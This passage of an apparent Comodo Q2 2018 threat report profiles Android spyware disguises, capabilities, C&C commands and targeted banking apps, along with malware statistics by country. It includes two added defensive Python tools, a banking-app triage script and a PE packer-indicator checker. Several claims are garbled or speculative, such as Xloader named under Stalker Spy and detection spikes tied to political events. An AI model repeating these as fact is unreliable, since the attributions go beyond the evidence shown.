KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control over the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. Also, it extracts the web history, account and contact details and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.

Version-1: Dardesh, Google Play Services, Instant Apps

Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.

4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1: Telegram, Groups, انتخاب دھم

Version-2: Postrall, Yes For Referendum, انتخاب دھم

Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机

Version-4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.

The third version is included in spyware named "Spymaster Pro" and can:

• Enable and disable the GPS services
• Record audio and send it to the Command & Control server
• Upload image files
• Collect information about the applications installed
• Collect the browser's data
• Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.

In addition to the abilities of the previous versions, it includes some additional tricks:

Extracts photos, audio and video

Records the screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend, it brings a bundle of malicious abilities:

Takes control of the Bluetooth adapter

Extracts data about accounts, contact details and installed apps

Extracts data from the WhatsApp message DB and related keys

Uploads the collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version 1 to Version 3: FaceBook, Chrome

Disguises of Xloader

After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs

Extract contacts details

Keep Wi-Fi always turned on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable a Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

App Distribution

FlexiSpy MBackup

HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service


Mobile Spy

随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z

CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can turn on the microphone of the infected device remotely to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it "a spy with a 007 license".

Version 1: Adobe Flash Player

Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:

Send_SMS — extract SMS content and send it to the C&C server

Send_USSD — send the USSD to the C&C server

Gethistory — monitor browser history

Start_AllApp — gather info about installed applications

Send_call — set the Intent action to call

Forward_call — forward incoming calls

ResForward_call — reset call forwarding

Go_Smsmnd — delete SMS content

Go_GetAlls — get SMS history

Dell_sms — delete SMS content in a conversation

Send_spam — send spam SMS

Start_Inject — call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot:

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp

Here are some commands from its Command and Control server:

contacts - Get contact details and email ID

Mute - Set action to mute

Mms - Get MMS content

info - Get device information

4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber

Version 2: Update Google Market, Flash Player, Tactic, FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

de.postbank.finanzassistent

pl.mbank

aib.ibank.android

The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
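Both Xloader and RedAlert begin by checking whether particular banking apps are installed. As an added example (not Comodo's code, and not taken from either malware), the following Python takes the output of `adb shell pm list packages` from a device or an MDM inventory and reports which of the target packages named in these two sections are present; the package names are the ones given on the page with the separator dots restored, and the inventory output below is constructed.

```python
"""Triage helper: which banking apps that Xloader and RedAlert hunt for are
present on a device?  Added example, not Comodo's code.  Target lists are the
package names from the report's Xloader and RedAlert sections (dots restored)."""
import re
from typing import Dict, Iterable, List

# Package names taken from the report (extraction dropped the dots; restored).
TARGETS: Dict[str, frozenset] = {
    "Xloader": frozenset({
        "com.wooribank.pib.smart", "com.kbstar.kbbank", "com.ibk.neobanking",
        "com.sc.danb.scbankapp", "com.shinhan.sbanking",
        "com.hanabank.ebk.channel.android.hananbank", "nh.smart",
        "com.epost.psf.sdsi", "com.kftc.kjbsmb", "com.smg.spbs",
    }),
    "RedAlert": frozenset({
        "de.postbank.finanzassistent", "pl.mbank", "aib.ibank.android",
    }),
}

# `pm list packages` prints "package:<name>"; with -f it prints
# "package:<apk path>=<name>".  In both forms the name is the last component.
_PM_LINE = re.compile(r"^package:(?:.*=)?(?P<name>[A-Za-z0-9_.]+)\s*$")


def parse_pm_list(output: str) -> List[str]:
    """Return package names from `adb shell pm list packages [-f]` output,
    skipping blank lines and unrelated noise such as adb daemon messages."""
    names = []
    for line in output.splitlines():
        m = _PM_LINE.match(line.strip())
        if m:
            names.append(m.group("name"))
    return names


def targeted_apps(installed: Iterable[str]) -> Dict[str, List[str]]:
    """Map each malware family to the target packages found on the device;
    families with no match are omitted."""
    present = set(installed)
    return {family: sorted(present & pkgs)
            for family, pkgs in TARGETS.items() if present & pkgs}


# Constructed sample of `adb shell pm list packages -f` output (not a real device).
SAMPLE_PM_OUTPUT = """\
package:/system/app/Chrome/Chrome.apk=com.android.chrome
package:/data/app/com.kbstar.kbbank-1/base.apk=com.kbstar.kbbank
package:/data/app/pl.mbank-2/base.apk=pl.mbank
package:/data/app/com.example.game-1/base.apk=com.example.game
* daemon not running; starting now at tcp:5037
"""

if __name__ == "__main__":
    hits = targeted_apps(parse_pm_list(SAMPLE_PM_OUTPUT))
    for family, pkgs in hits.items():
        print(f"{family}: target apps installed -> {', '.join(pkgs)}")
```

A device with any hit is one where these families' banking-app checks would succeed, which is where to look first for overlay or SMS-interception activity.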

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Version 1

CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره

Proxy دوست یاب Telegram Ton


شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Noticeably, it is sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts the spying activity: it steals text messages and audio records, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1

Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot

Reccoder-Call QRCodeBar Scanner APK

Let me love you ringtone Iphone Ringtone Night light

Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay

Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises listed under "Disguises of Sonvpay".

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them updating its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Version 1: Netflix Hack, Instagram Hack

Version 2: TSF Launcher

Version 3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via... another cryptominer, named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May


4.2.3 June 2018

Android-targeted malware in June


5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial of service. For this Q2 2018 report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory-resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives, such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.


5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and different operating systems, and it leverages an open-source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
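The packing described above leaves measurable traces in an executable: the compressed payload has near-maximal byte entropy, and the section the stub unpacks into is empty on disk but large in memory. As an added example (not Comodo's code and not part of UPX), the following Python walks a PE file's section table and reports those indicators; it flags stock UPX section names too, but a modified UPX build that renames its sections is still caught by the other two checks. The PE files it analyses are constructed inline, not real binaries.

```python
"""Section-level packing indicators for a PE file: stock UPX section names,
high-entropy sections, and sections empty on disk but large in memory.
Added example, not Comodo's or UPX's code; samples are constructed inline."""
import math
import struct
from typing import Dict, List, Tuple

UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}
ENTROPY_THRESHOLD = 7.0  # bits per byte; compressed or encrypted data sits near 8


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> List[Dict]:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", pe, coff + 2)
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        off = table + 40 * i  # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name, "virtual_size": vsize,
                         "raw_size": raw_size, "entropy": shannon_entropy(raw)})
    return sections


def packer_indicators(pe: bytes) -> Dict:
    """Collect human-readable packing indicators for one PE image."""
    sections = parse_sections(pe)
    indicators = []
    for s in sections:
        label = s["name"] or "<unnamed>"
        if s["name"] in UPX_SECTION_NAMES:
            indicators.append(f"stock UPX section name {label}")
        if s["entropy"] >= ENTROPY_THRESHOLD:
            indicators.append(f"high entropy {s['entropy']:.2f} in {label}")
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            indicators.append(f"{label} empty on disk, {s['virtual_size']:#x} bytes in memory")
    return {"sections": sections, "indicators": indicators,
            "likely_packed": bool(indicators)}


def build_sample_pe(specs: List[Tuple[bytes, bytes, int]]) -> bytes:
    """Constructed minimal PE32 (DOS stub, COFF header, zeroed optional header,
    section table, raw section data) from (name, raw_bytes, virtual_size) specs."""
    opt_size = 0xE0
    table_off = 0x40 + 4 + 20 + opt_size
    data_off = table_off + 40 * len(specs)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)   # PE32 magic only
    table, body, vaddr = b"", b"", 0x1000
    for name, raw, vsize in specs:
        table += struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, len(raw),
                             data_off + len(body), 0, 0, 0, 0, 0x60000020)
        body += raw
        vaddr += 0x1000
    return dos + b"PE\0\0" + coff + opt + table + body


# Constructed samples: a UPX-style layout, the same layout with renamed
# sections (as a modified UPX can produce), and an unpacked-looking binary.
HIGH_ENTROPY = bytes(range(256)) * 16        # exactly 8.0 bits/byte
PLAIN_CODE = b"\x90" * 4000 + b"\xc3" * 96    # repetitive bytes, low entropy
SAMPLE_UPX = build_sample_pe([(b"UPX0", b"", 0x8000), (b"UPX1", HIGH_ENTROPY, 0x2000)])
SAMPLE_RENAMED = build_sample_pe([(b".text", b"", 0x8000), (b".rsrc", HIGH_ENTROPY, 0x2000)])
SAMPLE_CLEAN = build_sample_pe([(b".text", PLAIN_CODE, 0x1000),
                                (b".data", b"Hello, world\0" * 64, 0x400)])

if __name__ == "__main__":
    for label, sample in (("upx", SAMPLE_UPX), ("renamed", SAMPLE_RENAMED), ("clean", SAMPLE_CLEAN)):
        print(label, packer_indicators(sample)["indicators"])
```

On a real file, pass `open(path, "rb").read()` to `packer_indicators`; the entropy and empty-on-disk checks are the ones that survive a packer renaming its sections.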


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact they are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical Analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.
